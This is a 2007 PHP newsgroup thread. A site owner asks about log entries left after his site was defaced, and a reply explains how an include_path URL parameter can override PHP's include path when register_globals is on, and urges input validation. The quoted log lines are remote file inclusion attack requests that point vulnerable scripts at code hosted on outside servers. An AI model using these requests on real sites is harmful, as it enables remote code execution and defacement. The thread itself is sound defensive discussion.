|
|
Posted by Jerry Stuckle on 10/15/07 02:28
Charles Crume wrote:
> Hello Everyone;
>
> My site was hacked the other day -- someone was able to rename my
> index.shtml file and put their own index.html file on my server. Not sure
> how it was done, but looking through the log file, I found a lots and lots
> of entries where an "include_path" parameter was included in the URL of the
> PHP page, as shown below:
>
> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
> /auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
>
> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
>
> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.0" 200 75 "-" "Mozilla/5.0"
>
> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
> 404 310 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
> 404 310 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
> /auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
> /includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
> /auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
>
> I know how "include_path" works when *in* the PHP file, but I'm not sure
> what the effect of including it in the URL. A number of entries show a code
> 404 as the culprits are obviously phising for pages, but requests with
> return code 200 are showing a large number of bytes transferred -- far
> larger than the PHP page itself.
>
> Can someone explain what adding "include_path" to a URL does?
>
> Is there something I need to check on my server of how I've got Apache
> configured?
>
> TIA.
>
> Charles...
>
>
>
The include_path itself in the url is just a variable. It's what you do
with it that's important. For instance, if you have register_globals
enabled, the include_path in the URL may override the system include_path.
Or, depending on what else you do in your code. This is a big reason
why it's good to use $_POST instead of $_REQUEST if you're posting a
form to a page - $_POST will ignore any $_GET parameters.
And just another reason to *ALWAYS* validate data coming from the user.
--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
jstucklex@attglobal.net
==================
Navigation:
[Reply to this message]
|